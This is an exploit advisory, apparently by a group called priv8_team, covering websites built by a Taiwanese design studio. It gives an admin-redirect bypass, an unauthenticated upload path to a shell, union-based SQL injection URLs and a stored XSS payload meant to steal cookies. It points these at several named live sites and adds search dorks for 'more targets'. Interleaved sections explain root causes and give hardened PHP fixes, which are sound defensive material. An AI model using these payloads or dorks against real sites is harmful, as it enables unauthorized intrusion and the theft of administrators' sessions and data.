~Exploit Title : Design by 年特資訊 - Multiple Vulnerabilities
~Exploit Author : priv8_team
~Home Vendor : http://net99.tw
~Date : Friday, 6 October 2017
~Test : Ubuntu 16.04 LTS (Xenial Xerus) - Firefox
~Tnx : Biskoit Pedar & RxR
-----------------------------------------
[ Description (Vendor) ]
We are a husband-and-wife studio (with business registration) and we can issue invoices. Unified Business Number: 40898804
Our studio's designers have been building websites and internal applications for nearly 20 years, with rich experience; our project completion rate is 99%.
Ordinary jobs, difficult jobs, and jobs that ordinary engineers cannot complete.
Our fees are reasonable, which is why many peers in the trade choose us as their preferred partner. Our areas of expertise:
website production, design, architecture and user-flow planning, through to professional copywriting, visual design and template/interface design.
[ Vulnerabilities ]
1) Admin Bypass (No Redirect)
2) Remote File Upload
3) SQL injection (Login required)
4) Stored Cross-Site Scripting (Login required)
[PoC]
Admin Bypass :
You can bypass the admin page with the NoRedirect add-on for Firefox
http://localhost:8080/admin/login.php << add this URL to NoRedirect
http://localhost:8080/admin/ or admin.php
vuln site : http://www.girls.org.tw/admin/index.php
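The advisory does not show the application source, so the root cause is an assumption here: a bypass that only needs the browser to ignore the Location header is the classic symptom of a page that sends a redirect when no admin session exists but keeps executing, so the protected content is still in the response body. The following is an added illustration, not the vendor's code; `$_SESSION['admin']` is a hypothetical session flag.

```php
<?php
// Added illustration of the suspected admin-bypass root cause and its fix.
// Not the vendor's code; $_SESSION['admin'] is an assumed session flag.

session_start();

// Vulnerable pattern (assumed): the redirect is sent, but execution continues.
function require_admin_vulnerable(): void
{
    if (empty($_SESSION['admin'])) {
        header('Location: login.php');
        // Missing exit: the rest of the page is still rendered and sent.
        // A client that ignores the Location header simply reads the body.
    }
}

// Hardened pattern: stop execution after the redirect and never rely on the
// client honouring the 302. The server, not the browser, enforces access.
function require_admin(): void
{
    if (empty($_SESSION['admin'])) {
        header('Location: login.php', true, 302);
        exit;
    }
}

// Session cookie hardening belongs alongside the check (assumed settings):
// HttpOnly keeps the cookie away from script, Secure keeps it off plain HTTP.
ini_set('session.cookie_httponly', '1');
ini_set('session.cookie_secure', '1');

require_admin();
// ... protected admin page continues here only for an authenticated admin ...
```

A quick check that does not need a browser add-on: request the admin page with `curl -s -o /dev/null -w '%{http_code} %{size_download}'` and no cookie. A fixed page answers 302 with an empty body; a vulnerable one answers 302 with the full admin page in the body.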
Remote File Upload :
http://localhost:8080/admin/upload.php
You can upload your files -
if you are clever, you can get a shell =)
vuln site : http://www.girls.org.tw/admin/upload.php
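What a hardened upload handler looks like, as an added example that is not the vendor's upload.php. It assumes a hypothetical `$_SESSION['admin']` flag, a form field named `img` (the field name seen in the advisory's POST data), and an upload directory outside the web root.

```php
<?php
// Added illustration, not the vendor's upload.php. Assumptions: an admin
// session flag $_SESSION['admin'], a form field 'img', and a storage
// directory that the web server does not serve directly.

session_start();

// 1. Authentication first: the advisory reports upload.php reachable without
//    a valid login, so nothing below may run for an anonymous client.
if (empty($_SESSION['admin'])) {
    http_response_code(403);
    exit('forbidden');
}

// 2. Validate the upload: size, real content type, extension allow-list.
$allowed  = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];
$maxBytes = 2 * 1024 * 1024;

if (!isset($_FILES['img']) || $_FILES['img']['error'] !== UPLOAD_ERR_OK) {
    http_response_code(400);
    exit('no file');
}
$f = $_FILES['img'];
if ($f['size'] > $maxBytes || !is_uploaded_file($f['tmp_name'])) {
    http_response_code(400);
    exit('bad upload');
}

// Decide the type from the bytes, not from the client-supplied file name or
// Content-Type header, both of which the uploader controls.
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime  = $finfo->file($f['tmp_name']);
$ext   = array_search($mime, $allowed, true);
if ($ext === false || getimagesize($f['tmp_name']) === false) {
    http_response_code(400);
    exit('only images are accepted');
}

// 3. Store under a server-generated name, outside the document root, so that
//    nothing the uploader chose (name, extension, path) can ever be executed.
$uploadDir = '/var/www/uploads';                    // assumed path, not web-served
$name      = bin2hex(random_bytes(16)) . '.' . $ext;
$dest      = $uploadDir . '/' . $name;

if (!move_uploaded_file($f['tmp_name'], $dest)) {
    http_response_code(500);
    exit('store failed');
}
chmod($dest, 0640);                                 // no execute bit, owner/group read
echo 'stored as ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
```

Files in the assumed `/var/www/uploads` directory are then served by a small read-only handler (or a static location with PHP execution disabled), never by letting the web server run whatever lands there.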
SQL injection :
file : edit_portfolio.php - products_index.php
parameter : id
Type : Basic Union Based Injection
vuln site : http://www.girls.org.tw/admin/edit_portfolio.php?id=-16%27+UNION%20SELECT%201,user(),3,4,5-- -
vuln site : http://sh-printing.com.tw/single.php?id=17%27+order+by+4--%20-
vuln site : http://www.u-hope.net/products_index.php?id=-14'+UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11--+
vuln site : https://www.omniko-intl.com/products_index.php?id=-47'+UNION SELECT 1,2,user(),4,5,6-- -
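The payloads above only work if the `id` value is spliced into the SQL text as a string. The following added example (not the vendor's code) shows that assumed vulnerable pattern next to the parameterised version; the table name `portfolio` and its columns are assumed from the field names in the advisory, and the DSN and credentials are placeholders.

```php
<?php
// Added illustration, not the vendor's code. Table/column names, DSN and
// credentials are assumptions.

// Vulnerable pattern (assumed): user input interpolated into the statement.
// With id=-16' UNION SELECT 1,user(),3,4,5-- - the quote closes the literal
// and the rest of the input is executed as SQL.
function load_portfolio_vulnerable(PDO $db, string $id): ?array
{
    $sql = "SELECT * FROM portfolio WHERE id='" . $id . "'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened pattern: validate the type and bind the value as a parameter.
// The database receives the statement and the value separately, so the
// value can never change the statement's structure.
function load_portfolio(PDO $db, string $rawId): ?array
{
    // id is a numeric key in this application; reject anything else early.
    if (!ctype_digit($rawId)) {
        return null;
    }
    $stmt = $db->prepare(
        'SELECT id, category, title, img, sor FROM portfolio WHERE id = :id'
    );
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Emulated prepares disabled so binding happens server-side (assumed DSN).
$pdo = new PDO(
    'mysql:host=localhost;dbname=app;charset=utf8mb4',
    'app_user',
    'CHANGE_ME',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,
    ]
);

$row = load_portfolio($pdo, $_GET['id'] ?? '');
if ($row === null) {
    http_response_code(404);
    exit('not found');
}
```

The `ctype_digit` check is a second layer, not the fix: the binding is what removes the injection, and it still holds for columns that legitimately accept quotes or `UNION` as data.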
Stored Cross site scripting :
http://localhost:8080/admin/edit_portfolio.php?id=16&action=save
file : edit_portfolio.php
parameter : id
Type : Stored Cross-Site Scripting
Post Data : category="><script>alert('Xss')</script>&title="><script>alert('Xss')</script>&img=img/20170126071854.jpg&sor=2&Submit=提交
When you replay the request with the Live HTTP Headers add-on, the XSS payload is stored in the categories.
When users or an admin visit the admin page, you get their cookies or browser hooking =)
vuln site : http://www.girls.org.tw/admin/edit_portfolio.php?id=16&action=save
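The stored payload fires because the saved `category` and `title` values are echoed back into admin pages unencoded. The added example below (not the vendor's edit_portfolio.php) renders the advisory's own payload through contextual output encoding, with light input cleaning and a Content-Security-Policy header as extra layers; the row layout is assumed from the POST field names.

```php
<?php
// Added illustration, not the vendor's code. Row/field names are assumed
// from the POST data in the advisory.

// Contextual encoder for HTML body and attribute-value contexts.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Vulnerable rendering (assumed): stored values straight into the markup.
// category="><script>... closes the attribute and injects a script element.
function render_row_vulnerable(array $row): string
{
    return '<tr><td>' . $row['category'] . '</td>'
         . '<td><input name="title" value="' . $row['title'] . '"></td></tr>';
}

// Hardened rendering: encode at the point of output, in every context.
function render_row(array $row): string
{
    return '<tr><td>' . e($row['category']) . '</td>'
         . '<td><input name="title" value="' . e($row['title']) . '"></td></tr>';
}

// Defence in depth on save: bound the length and strip control characters.
// This does not replace output encoding; it only narrows what gets stored.
function clean_text_field(string $v, int $max = 200): string
{
    $v = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/u', '', $v) ?? '';
    return mb_substr(trim($v), 0, $max);
}

// Response-level safety net: no inline script may run even if encoding is
// missed somewhere. Must be sent before any output.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'");

// The advisory's payload, now rendered inert.
$row = [
    'category' => clean_text_field('"><script>alert(\'Xss\')</script>'),
    'title'    => clean_text_field('"><script>alert(\'Xss\')</script>'),
];
echo render_row($row);
// The output contains &quot;&gt;&lt;script&gt;... as text, not as markup.
```

Because the save endpoint accepted a replayed POST, an anti-CSRF token on the edit form would be the natural companion to this fix, but the advisory does not cover that request path, so it is left out here.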
[ Dork ]
intext:"Design by 年特資訊"
intext:"Design by 年特資訊" inurl:id=
you can find more targets =)
------------------------------------------
Special tnx: Mr_Yous3fi , Safengine , RxR And All Members of Priv8_Team
./priv8_team
#Biskoit_Pedar